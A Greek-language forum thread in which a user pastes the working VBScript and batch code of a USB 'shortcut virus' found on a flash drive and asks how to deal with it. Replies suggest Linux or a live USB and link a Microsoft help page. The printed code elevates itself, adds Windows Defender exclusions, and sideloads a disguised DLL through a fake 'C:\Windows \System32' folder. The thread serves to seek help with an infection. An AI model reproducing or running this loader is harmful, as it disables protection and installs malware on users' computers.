If Not WScript.Arguments.Named.Exists("elevated") Then
Set sh = CreateObject("Shell.Application")
sh.ShellExecute "wscript.exe", Chr(34) & WScript.ScriptFullName & Chr(34) & " /elevated", "", "runas", 1
WScript.Quit
End If
Set fs = CreateObject("Scripting.FileSystemObject")
pp = fs.GetParentFolderName(WScript.ScriptFullName)
bp = pp & "\u197288.bat"
If fs.FileExists(bp) Then
Set sp = WScript.CreateObject("WScript.Shell")
sp.Run Chr(34) & bp & Chr(34), 0
End If@echo off
chcp 65001
explorer "%~dp0..\KINGSTON"
if exist "%~dp0u509436.dat" if not exist "C:\Windows \System32\printui.dll" (
powershell -Command "Add-MpPreference -ExclusionPath '%~dp0'; Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Start-Sleep -Seconds 2"
if exist "C:\Windows \System32" rmdir /S /Q "\\?\C:\Windows "
mkdir "\\?\C:\Windows \System32"
xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y
xcopy "%~dp0u509436.dat" "C:\Windows \System32" /Y
ren "C:\Windows \System32\u509436.dat" "printui.dll"
if exist "C:\Windows \System32\printui.exe" (
if exist "C:\Windows \System32\printui.dll" (
start "" "C:\Windows \System32\printui.exe"
) else rmdir /S /Q "\\?\C:\Windows "
) else rmdir /S /Q "\\?\C:\Windows "
)σε ένα φλασάκι βρήκα τέσσερα ύποπτα αρχεία
Ήταν όλα σε ένα φάκελο με όνομα sysvolume. Πιο πάνω παραθέτω τον κώδικα για δύο από αυτά. Το αποτέλεσμα είναι ότι εξαφανίζονται όλα τα αρχεία που υπάρχουν στο φλασάκι και εμφανίζεται μια συντόμευση!
Πώς το διαχειριζόμαστε;
Εγκαθιστούμε Linux.
Ή τρέχουμε απο live usb.
Κάνεις με αυτό το τρόπο έρευνα, αρχικά για να δεις αν διασώζεται τίποτα από τα αρχέια σου.
Μελέτη κάνεις αν δε βγει έτσι λύση.
Δες κι εδώ:
https://learn.microsoft.com/en-us/answers/questions/2672789/remove-shortcut-virus-iexplore-vbs-from-flash-driv